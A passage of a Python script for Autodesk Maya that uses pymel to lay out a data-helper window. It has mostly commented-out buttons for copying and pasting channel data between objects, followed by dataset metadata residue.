# p=column_layout, label=u"替换:", cw2=[60, 240], text="_R_")
# self.task_info_control = pm.text(
# p=column_layout,
# label=u"已经复制%s个对象的通道栏数据" % self.joint_number,
# w=300,
# al="left")
# pm.setParent(column_layout)
# self.copy_button = pm.button(
# p=form_layout,
# label=u"复制数据", w=80, c=lambda *args: self.copy_expression())
# self.select_source_button = pm.button(
# p=form_layout,
# label=u"选择来源",
# w=80, c=lambda *args: self.select_source_object())
# self.select_target_button = pm.button(
# p=form_layout,
# label=u"选择目标",
# w=80, c=lambda *args: self.select_target_object())
# self.paste_button = pm.button(
# p=form_layout,
# label=u"拷贝数据", w=80, c=lambda *args: self.paste_expression())
pm.radioCollection(collection1, edit=True, select=rb1)
pm.formLayout(
form_layout, edit=True,
attachForm=[
(work_mode_layout, "top", 5),
(work_mode_layout, "left", 10),
(work_mode_layout, "right", 10),
(container_layout, 'left', 10),
(container_layout, 'right', 10),
(mirror_btn, 'left', 10),
(mirror_btn, 'right', 10),
(mirror_btn, 'bottom', 10),
],
attachControl=[
(container_layout, 'top', 10, work_mode_layout),
])
pm.showWindow("xdDataHelperWnd")
| [
"jzboylxj@163.com"
] | jzboylxj@163.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.